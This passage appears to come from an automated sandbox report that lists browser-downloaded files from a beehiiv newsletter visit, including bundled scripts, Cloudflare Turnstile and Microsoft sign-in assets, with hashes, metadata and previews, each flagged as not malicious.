                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="9db0a2ad-5a8d-5638-919b-8c0c44a0307e")}catch(e){}}();.import{j as e}from"./jsx-runtime-BjG_zV1W.js";import{r as u,u as ue,a as me}from"./index-D6da9p6-.js";import{_ as H}from"./index-CqJN8iQq.js";import{S as pe}from"./StatusInputs-JkVhk_jg.js";import{a as fe,u as he,L as xe}from"./PageProvider-uKxoiNdl.js";import{u as ge}from"./useToast-DK42uF07.js";import{u as Y}from"./useTranslation-CfKJAmGY.js";import{u as Ee,d as ke,c as be}from"./components-Oj2xMfGE.js";import{c as N}from"./index-x2da_zcv.js";import{u as Q}from"./WebThemeContext-DttfuZxo.js";function Re(){return()=>{}}function Se(){return u.useSyncExternalStore(Re,()=>!0,()=>!1)}function ve({children:t,fallback:o=null}){return Se()?u.createElement(u.Fragment,null,t()):u.createElement(u.Fragment,null,o)}const _e="bhba",ot=.17
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text, with very long lines (1531)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):1900
                                                                                                                                            Entropy (8bit):5.516430742609563
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:UgqHHVvCaRuSe3NCad0YDzdcxRN5RriZjl24T0+QHLmMNHEBbuR3nTRPYRkGgGor:JWkEaN1dh96NjiZjl24T0tRYAnZoiz
                                                                                                                                            MD5:CD7E27F71F3C5A260C3C32664FD6758D
                                                                                                                                            SHA1:D91BED8C840C7DCEEFE8070A5A87EA71FF1763AE
                                                                                                                                            SHA-256:6F930BFF7C3E52B74B530DDC7F3B27C9417084B7787222709FCD09CAE95509E0
                                                                                                                                            SHA-512:561D610C9E20EA6845BF33499B1B3521E0974E4B49C672084B8DA3040F4C15D3EAD7617E0704E6E958E927F5461264E10B792B891262D3141D75EF7FC3D37B48
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://kanes-newsletter-871ead.beehiiv.com/assets/PoweredByBeehiiv-BmLCj73J.js
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="9e5ad2d0-04cf-5456-a989-f5bdd78dc911")}catch(e){}}();.import{j as e}from"./jsx-runtime-BjG_zV1W.js";import{t as s}from"./i18next-BV1g0mjb.js";import{T as t}from"./index-BdpAPpdN.js";const a=({className:r})=>e.jsx("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",className:r,viewBox:"0 0 30 30",children:e.jsx("path",{fill:"#0B0D2A",d:"M25.692 13.168H3.866c-.556 0-1.01-.458-1.01-1.017V10.6c0-1.755 1.414-3.178 3.157-3.178H23.52c1.743 0 3.157 1.423 3.157 3.177v1.55a.98.98 0 0 1-.985 1.018ZM21.092 5.745H8.462a1.044 1.044 0 0 1-1.036-1.042C7.426 2.11 9.523 0 12.099 0h5.356c2.576 0 4.673 2.11 4.673 4.703 0 .584-.455 1.042-1.036 1.042ZM26.702 14.845H2.855C1.288 14.845 0 16.142 0 17.718c0 1.576 1.288 2.872 2.855 2.872h8.462c.303-1.627 1.718-2.872 3.436-2.872a3.532 3.532 0 0 1 3.46 2.8
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:PNG image data, 55 x 62, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):61
                                                                                                                                            Entropy (8bit):3.97087340324095
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:yionv//thPliBt//TOpsyxl/k4E08up:6v/lhPKKH7Tp
                                                                                                                                            MD5:26338FA09255E32CC39F3D2A167D637A
                                                                                                                                            SHA1:C9B7675BC9220F34EA0119D1512404B5DE251D77
                                                                                                                                            SHA-256:EB718A36FD924D3BC873BDEFFBA0A0A57D6485402BAF03CC49C0FB3C79E51547
                                                                                                                                            SHA-512:22C94080468DB8FCE55E914C087A2A25BF6C933F989C5E71205579B9C02830B31465CE9372B596C0CC2CC611095A2B21C6697E3AD262E64C8A1DCAAA51596E80
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:.PNG........IHDR...7...>.............IDAT.....$.....IEND.B`.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):658
                                                                                                                                            Entropy (8bit):5.543898320885979
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:UgDGH4LOaOvCaBfuS+YvBLNwHpaxvuxPUQr9SULXllMHSbl2OQq1vB+:UgqHHVvCaRuS+IBLNkaxAPxr9SillMHX
                                                                                                                                            MD5:37B30F1E552B6D056A3D09FEFBDDE385
                                                                                                                                            SHA1:4EDC7303D1E56C87AB61965CBAD9C1EA3CD64DA5
                                                                                                                                            SHA-256:DE693D0C5DDDF38D08D5FEF6BF00F01C37D8A685EF937574C9776BFED48A7887
                                                                                                                                            SHA-512:597221DC1448027DF64ED7D71301EAEC2D0BEC61354F5C6C5E9BCBB77A24DA0BEDBD407F7F8A3150C85C093FB4EBA39FCF9CA6BAB409371C4C8F2681460F5677
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://kanes-newsletter-871ead.beehiiv.com/assets/index-BxYGUTX4.js
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="c4ae2679-7619-5e59-be5a-1ac21a6e650e")}catch(e){}}();.import{j as s}from"./jsx-runtime-BjG_zV1W.js";import{c as x}from"./index-x2da_zcv.js";const e="px-4 sm:px-6",n="mx-auto w-full max-w-6xl",i=({as:a="div",className:o,style:t={},children:m,ref:r})=>s.jsx(a,{className:x(e,o),style:t,ref:r,children:s.jsx("div",{className:n,children:m})});export{i as B};.//# sourceMappingURL=index-BxYGUTX4.js.map..//# debugId=c4ae2679-7619-5e59-be5a-1ac21a6e650e.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):536
                                                                                                                                            Entropy (8bit):5.609334933818731
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:UgDGH4LOaOvCaBfuSAqMNw2dpavI+wtiHpW4L6q9:UgqHHVvCaRuSNMNxbavTwtiwe79
                                                                                                                                            MD5:71DA4CD621E9E533179C44473C9F558F
                                                                                                                                            SHA1:D107DDDDBBA685F3814BA6CBB248B70FB03A5D8D
                                                                                                                                            SHA-256:32C71DFD42E5C64E61C4C80D20153D755B2BDB312B63BD9B4FBA9A5F673949AE
                                                                                                                                            SHA-512:E3C1B615C8190FA9BFE8FF88828927A85A91C64A0A205963008004FD60835F78A48D5614C3D9E7E0718FAFC13E084E7F8B83F54C176DA0E329EFC24847253A73
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="0c611f49-1d08-5b35-bc2f-55f3bd461270")}catch(e){}}();.import{j as r}from"./jsx-runtime-BjG_zV1W.js";const e=({children:s,noLayout:t})=>t?r.jsx(r.Fragment,{children:s}):r.jsx("main",{className:"flex-grow",children:s});export{e as M};.//# sourceMappingURL=index-DIU-Hrs1.js.map..//# debugId=0c611f49-1d08-5b35-bc2f-55f3bd461270.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):561
                                                                                                                                            Entropy (8bit):5.531083451151844
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:UgDGH4LOaOvCaBfuSRWr2WNwugd1uedYrbjwaHqDuU6PlK+PsKr2H:UgqHHVvCaRuS2zN5Aue4jwaKDuUglK+k
                                                                                                                                            MD5:8F77952271293BF38C99CE6ED52B7B5D
                                                                                                                                            SHA1:5E5EEF9A687C0F2AB92C4B1609B944454D77D8C1
                                                                                                                                            SHA-256:18775F20106F9E07451947242885899D1FAAA542B259691BAFC70F5BBFB666F9
                                                                                                                                            SHA-512:2B1573F2A8827AF8ECF89304C9BF0E3A35F04C1FB4FC4B452924C980CEF3AD6AFE9E5EA4797A4DABE1EFD5761E8B14F934BAF7E88190DCCAF9EE5918080B972A
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="10d9c228-3990-5929-89c1-3f82c1c46723")}catch(e){}}();.import{b as r}from"./components-Oj2xMfGE.js";const t=()=>{const o=r()[0];if(!o)throw new Error("This hook should only be called in child routes to root");return o.data.isLoggedIn};export{t as u};.//# sourceMappingURL=useIsLoggedIn-BbU3-q43.js.map..//# debugId=10d9c228-3990-5929-89c1-3f82c1c46723.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (65402)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):171550
                                                                                                                                            Entropy (8bit):5.675906166252663
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:uoPRtO/tMnX3kOsI2zIJH49Nee7jlz7aBobMhTsjYZfMtTm4vFGSN:uoe+nX3kg2UJH4EsEYjYZEt6sV
                                                                                                                                            MD5:863047C2A9C5ED34D8B2933868EE0279
                                                                                                                                            SHA1:60AF5093AB9C50BE20A1115D1D526F93CA0DBA3B
                                                                                                                                            SHA-256:24CEB753E5BE0F764C669259E05093833BFB80184A501140B026926AEED5D9CF
                                                                                                                                            SHA-512:4D82F6CD44BCCE4FC099C307598A91AF44333847EF2B758183981ED2718FFC00FB97FE1D7202C0DB1C6A22E7FF82E37EE64D5C20B29FBEA6447BA1439469F142
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://client.px-cloud.net/PXeBumDLwe/main.min.js
                                                                                                                                            Preview:// @license Copyright (C) 2014-2025 PerimeterX, Inc (www.perimeterx.com). Content of this file can not be copied and/or distributed..try{window._pxAppId="PXeBumDLwe",function(){"use strict";function t(e){return t="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(t){return typeof t}:function(t){return t&&"function"==typeof Symbol&&t.constructor===Symbol&&t!==Symbol.prototype?"symbol":typeof t},t(e)}function e(t,e){(null==e||e>t.length)&&(e=t.length);for(var n=0,r=new Array(e);n<e;n++)r[n]=t[n];return r}function n(t,n){if(t){if("string"==typeof t)return e(t,n);var r=Object.prototype.toString.call(t).slice(8,-1);return"Object"===r&&t.constructor&&(r=t.constructor.name),"Map"===r||"Set"===r?Array.from(t):"Arguments"===r||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(r)?e(t,n):void 0}}function r(t){return function(t){if(Array.isArray(t))return e(t)}(t)||function(t){if("undefined"!=typeof Symbol&&null!=t[Symbol.iterator]||null!=t["@@iterator"])return Array.from(t)}(t)||
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 90677
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):32811
                                                                                                                                            Entropy (8bit):7.992877953733209
                                                                                                                                            Encrypted:true
                                                                                                                                            SSDEEP:768:fDPYSdMWwCyzH8REcKPN/8p0x7UQzlRMXv1FevViDAqA:a8REcsUp0xUQzc/8VCAV
                                                                                                                                            MD5:2E287EB418940084B921590C6E672C9E
                                                                                                                                            SHA1:1FC75A9DAA054EF88AAEA181F3A9B4CBA2B6B6E1
                                                                                                                                            SHA-256:6C2C58DAAE76131A00D1BFEE20852F372CF594BE7F4A8848ACC42F8BF72C1BBD
                                                                                                                                            SHA-512:A77F69571B0F04F4A2354D9E18E41EF86F22274EAED20C02215B632BFEF09C6543A83591E9DB3F2B4036A9684BFF666EB6A7B253BA18893500E9CD541AB752A0
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://logincdn.msauth.net/shared/5/chunks/oneds-analytics-js_077217740c853b5d4fe8.js
                                                                                                                                            Preview:...........iw.8.?.~>....%."9K'R...q:.fw.,.n_.Z.l.eRMR^b.O...A.N...yq.t,b!.....BU....4kM.Lr..I.]DE.&..TF..K.J.9.7.$....(..'?....f...tG...?y8~0..;..w;[....;.u........D.......N:W.d........E..eR...q..sJG.O.Z,....l......~.........'.d.......n.N..@.../....l'...".J3Y..n3Y...o..T...P0..j..-.....v.m7T.LM. .....Ev.7...IC.q..[.t>nj.e..OE<m...l)^.K.......8:M.&.]zz*..j.X..K........'3..Tk....Z.2.GQ6..Fi._.|v.Bf.W?...T.]:j(.%F.)..t_^........8.:..DN..8....B.>|<..~..|H.x.q.=-.f.~..{.z..&t...e.LfE,.;.d...n.....2..FH. .Y,.J...EC.cj. .F......o.....\...&\.J..fJiJ.S..4.5..NM]m.....Q.....e.O..iSs'........'Z..6A(Y.8..eQ.....2..I.?...;dS..I...D..@./7t.:z.......c...dF..B.......9...8)..h.........<.I...2.\FY+.=S.8...$Qv...<..IL.x".w9_..3.."-nfR.(..WDN..L.....z..I8.E..Ub......d..M.....sq.N........p.*.lX...A]3Y....j...%.`N..G.v..6.m.KH.M......Z..a2.N.....4....,u.O.vWM...=d..J.r`..b.....N.hzp..C..?.. ......:..M6............;.w.."B.^.ZP.N.:.[..(:...(.y.)q...
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1592
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):621
                                                                                                                                            Entropy (8bit):7.673946009263606
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:Xp7fmqfW/e4YC2L0E5DZLB62y/+6lbPa1Gotq8mdd2Xmy2QLBwxD+QkCfBJ:Xp6qf2SCk3LBpy/rtPa1GKq8mOX5jLcD
                                                                                                                                            MD5:4761405717E938D7E7400BB15715DB1E
                                                                                                                                            SHA1:76FED7C229D353A27DB3257F5927C1EAF0AB8DE9
                                                                                                                                            SHA-256:F7ED91A1DAB5BB2802A7A3B3890DF4777588CCBE04903260FBA83E6E64C90DDF
                                                                                                                                            SHA-512:E8DAC6F81EB4EBA2722E9F34DAF9B99548E5C40CCA93791FBEDA3DEBD8D6E401975FC1A75986C0E7262AFA1B9D1475E1008A89B92C8A7BEC84D8A917F221B4A2
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://aadcdn.msauth.net/shared/1.0/content/images/signin-options_3e3f6b73c3f310c31d2c4d131a8ab8c6.svg
                                                                                                                                            Preview:..........}UMo"1..+.....G; .8l...M..$.U.AW......UaX..`'.=......|..z3...Ms>..Y...QB..W..y..6.......?..........L.W=m....=..w.)...nw...a.z......#.y.j...m...P...#...6....6.u.u...OF.V..07b..\...s.f..U..N..B...>.d.-z..x.2..Lr.Rr)....JF.z.;Lh.....q.2.A....[.&".S..:......]........#k.U#57V..k5.tdM.j.9.FMQ2..H:.~op..H.......hQ.#...r[.T.$.@........j.xc.x0..I.B:#{iP1.e'..S4.:...mN.4)<W.A.).g.+..PZ&.$.#.6v.+.!...x*...}.._...d...#.Cb..(..^k..h!..7.dx.WHB......(.6g.7.Wwt.I<.......o.;.....Oi$}f.6.....:P..!<5.(.p.e.%et.)w8LA.l9r..n.....?.F.DrK...H....0F...{.,.......{E.."....*...x.@..?u......../....8...
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text, with very long lines (2103)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):2472
                                                                                                                                            Entropy (8bit):5.345768973919404
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:JWkEtNHe0drPVl3V2grSPEAjk1A8r+3Nwdxkdy:QXBtf2grqEAj42dy
                                                                                                                                            MD5:48D8EC3A35C0DA31F927633FE678C8AA
                                                                                                                                            SHA1:6801A82D26C8CFB31E55DCC8D32E22E9E4D5592B
                                                                                                                                            SHA-256:C6360201E48DA96CEFE1D83EEC98144BDDC02ECE5A196DB4219D4EBE1CAB6342
                                                                                                                                            SHA-512:901208323EACA0D231B7D5696DFFA866A6D80CC3D59D539C4FA1C8BED82E9BB72AC769309848C39BFD92D8641C9934943623BE9490E110798B6FC753703EF2C4
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://kanes-newsletter-871ead.beehiiv.com/assets/FreeGatedContent-D-EWr0IZ.js
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="0f25245c-76dc-5111-b8b6-22c1fda64748")}catch(e){}}();.import{j as s}from"./jsx-runtime-BjG_zV1W.js";import{c as o}from"./index-x2da_zcv.js";import{S as u,a as g}from"./CreateAction-Dl0JjCOR.js";import{T as t}from"./index-BdpAPpdN.js";import{d as p,L as n}from"./components-Oj2xMfGE.js";import{u as f}from"./useTranslation-CfKJAmGY.js";import{F as y}from"./LockClosedIcon-BluoCUMI.js";const v=({title:l,message:c,cta:i,publication:a,theme:e,createActionType:x=g.GATED})=>{const{signupWidgetConfigs:b}=p("root"),{t:r}=f(),d=a.web_template.web_theme.color_background,m=a.web_template.web_theme.color_body;return s.jsxs("div",{className:o("mx-auto flex w-full flex-col items-center px-10",{"mb-10 bg-wt-text-on-background py-10 text-wt-background":e==="subscribe-gate"},{"max-w-xl bg-transparen
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (47520)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):47521
                                                                                                                                            Entropy (8bit):5.3981340461317835
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:11CQfmIG2Y8rHnzH5ei80aszzQhpdldr6F/PG2XvE2L79noBL5o6HBU91KL5Gc05:1a/0HnzH5eJdV0lGYv7f96Hjy
                                                                                                                                            MD5:7C92EC9D1395055CE0405A32607C7291
                                                                                                                                            SHA1:4EF0060484503E7A3D005254484D5A7FACF42F27
                                                                                                                                            SHA-256:A0DDAE0FB79C4A4A66D8613157A0703771FA9BE1A75790FCCF5EEEBAA329788B
                                                                                                                                            SHA-512:D5FAD8CE3B4B3603A6C48676E3F561437034F469875608FF1795505BFA89853A63767E32A1E65BC541DF18C555F93DB42896AA0C1EBD9B162EFC1899FE2D925B
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://challenges.cloudflare.com/turnstile/v0/b/e0c90b6a3ed1/api.js
                                                                                                                                            Preview:"use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Wt(u,o,c,g,h,"next",l)}function h(l){Wt(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:JSON data
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):23
                                                                                                                                            Entropy (8bit):3.882045108136863
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:YXQA+cW4Yn:YgLxVn
                                                                                                                                            MD5:8C681D0A3C425A688B468A1B23C7425B
                                                                                                                                            SHA1:97581862CB214FF3888B2621671AA3E6B3857373
                                                                                                                                            SHA-256:CD92F9D1EDC6D92BF5272E78178DAC8D5F5346411E0537936023A081DEC9FE28
                                                                                                                                            SHA-512:59ACC2179FBAD969B2840820B827302E7CE9DD51A0DE9811178539977A0961015F433983F881737EEFEEC7726405C9249F0156CED7D2DB0730926DC3F0241176
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://kanes-newsletter-871ead.beehiiv.com/recommended_posts?post_id=f81a7c40-e8a8-41d3-9598-303f3006911a&_data=routes%2F__loaders%2Frecommended_posts
                                                                                                                                            Preview:{"recommendedPosts":[]}
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (1493)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):1851
                                                                                                                                            Entropy (8bit):5.2892427122782655
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:JWkExNTu5K0n8JXXckjbfD7YUsBfs4EWO1nnd:Q/u5K0n8JntX73sBELW6d
                                                                                                                                            MD5:FD91096C9A8D69C49E01D5156E3C9805
                                                                                                                                            SHA1:9190FA53C80490D21ABF75C69ED6CCE026800986
                                                                                                                                            SHA-256:87AD36C164297AFFA5938FF569D3D8E13C903E4C373C3EFE52CD492A908F6769
                                                                                                                                            SHA-512:69D45C079358B072FFAAE297161AD3DD3BC1EEF8ACFB49F2FA938FF579425E1D62B5F46BD2D7F1DC75A3D8E3EF74514591808E7F39BFB38A32313BAA7C1984EA
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://kanes-newsletter-871ead.beehiiv.com/assets/index-BbnTzeLf.js
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="bae72ac9-95e5-569f-b736-65af3ae4a791")}catch(e){}}();.const k=["og:title","og:url","og:description","og:description","og:image","og:title","og:image:width","og:image:height","og:image:alt","og:type","og:site_name"],M=["keywords","author","robots","viewport","description","twitter:title","twitter:url","twitter:description","twitter:image","twitter:card","fb:app_id"],A=({canonicalUrl:g,matches:d,overrides:o={},links:c=[],returnEarlyCheck:h=!1,structuredData:p})=>{const n=d.find(t=>t?.id==="root"),i=n?.data?.publication,s=i?.name||o?.title||"",a=i?.description||o?.description||"",w=n?.meta,u=[],y=w?.reduce((t,e)=>{if(e.tagName==="link")return u.push(e),t;const m=Object.keys(e)[0],b=e[m];return t[m]=b,t},{})||{};if(h||!i)return[];const l={...y,title:s,description:a,"og:type":"website
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:PNG image data, 55 x 62, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):61
                                                                                                                                            Entropy (8bit):3.97087340324095
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:yionv//thPliBt//TOpsyxl/k4E08up:6v/lhPKKH7Tp
                                                                                                                                            MD5:26338FA09255E32CC39F3D2A167D637A
                                                                                                                                            SHA1:C9B7675BC9220F34EA0119D1512404B5DE251D77
                                                                                                                                            SHA-256:EB718A36FD924D3BC873BDEFFBA0A0A57D6485402BAF03CC49C0FB3C79E51547
                                                                                                                                            SHA-512:22C94080468DB8FCE55E914C087A2A25BF6C933F989C5E71205579B9C02830B31465CE9372B596C0CC2CC611095A2B21C6697E3AD262E64C8A1DCAAA51596E80
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/9027d8d7696df5f4/1736964884740/vBy9sdd_6wtJu9Q
                                                                                                                                            Preview:.PNG........IHDR...7...>.............IDAT.....$.....IEND.B`.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (46306)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):169070
                                                                                                                                            Entropy (8bit):5.3041506032822365
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:2LuISaNADzREMZiGPWIIvTFQtaJoGh/m7CGiARistQ0+qzCVwQVRFwzieCbqLkqh:2jSuINdYGOlwGr5Y+tyc1x07
                                                                                                                                            MD5:24C659AFE885497D457B0CC84F344C6F
                                                                                                                                            SHA1:A34DE0DF0004ABFD1DC5F859ECE003D7831396AC
                                                                                                                                            SHA-256:06A55F57BE74D334FFCF06F3889B6CDC1CF0E425A2384E552CC9E692401E575D
                                                                                                                                            SHA-512:60786C7EE9598AD275B031E2D7A7F5C7D2A1BD32CA08B098B1D73FC80F6F2938BD4A0B4198BE8C33E6DE2B60924E3C2C4817E1C005EDC02808C002F8A5C1BA44
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="eba05efb-3c74-5e66-9b9c-529ea8b88970")}catch(e){}}();.import{j as ze}from"./jsx-runtime-BjG_zV1W.js";import{c as pt,g as qi}from"./index-D6da9p6-.js";function Ui(e,t){const n={};return(e[e.length-1]===""?[...e,""]:e).join((n.padRight?" ":"")+","+(n.padLeft===!1?"":" ")).trim()}const Vi=/^[$_\p{ID_Start}][$_\u{200C}\u{200D}\p{ID_Continue}]*$/u,Wi=/^[$_\p{ID_Start}][-$_\u{200C}\u{200D}\p{ID_Continue}]*$/u,Qi={};function mt(e,t){return(Qi.jsx?Wi:Vi).test(e)}const Yi=/[ \t\n\f\r]/g;function Xi(e){return typeof e=="object"?e.type==="text"?gt(e.value):!1:gt(e)}function gt(e){return e.replace(Yi,"")===""}class We{constructor(t,n,r){this.property=t,this.normal=n,r&&(this.space=r)}}We.prototype.property={};We.prototype.normal={};We.prototype.space=null;function Sr(e,t){const n={},r={};let
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text, with very long lines (1037)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1401
                                                                                                                                            Entropy (8bit):5.385236089561547
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:UgqHHVvCaRuSrIzNuUuV9DUF40bN5iycbkME3fwhqnnWFYSYcUlt45o43F4XnJsx:JWkEPIzNUV9DUF5/53foqnG0cUT4a43R
                                                                                                                                            MD5:510FDDB00701D6605C824F1EB0A7EA9A
                                                                                                                                            SHA1:488D6C2C27F496497F910D76F955199B5B9B3CE6
                                                                                                                                            SHA-256:645173E8089066C1AC711E5CD5BD00C6937DFD7FC93EA05989A657872DE24C7D
                                                                                                                                            SHA-512:C7A64511C9315D77CF51D8DF8A8714961278A5661FB30E88E6EB749516F6E094C09F9612EF28D8C9D5A96E7E30FF03C41543A7125882E6CB24A955C84364AF61
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="75c399d0-b648-50b8-b4cc-d715f4aee401")}catch(e){}}();.import{r as l,e as m}from"./index-D6da9p6-.js";import{U as d,I as f,y as g,l as h,C as x,o as E}from"./keyboard-CaEu2o0u.js";let u=l.createContext(null);function c(){let o=l.useContext(u);if(o===null){let t=new Error("You used a <Description /> component, but it is not inside a relevant parent.");throw Error.captureStackTrace&&Error.captureStackTrace(t,c),t}return o}function P(){let[o,t]=l.useState([]);return[o.length>0?o.join(" "):void 0,l.useMemo(()=>function(e){let n=E(r=>(t(i=>[...i,r]),()=>t(i=>{let s=i.slice(),p=s.indexOf(r);return p!==-1&&s.splice(p,1),s}))),a=l.useMemo(()=>({register:n,slot:e.slot,name:e.name,props:e.props}),[n,e.slot,e.name,e.props]);return m.createElement(u.Provider,{value:a},e.children)},[t])]}let v
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text, with very long lines (346)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):710
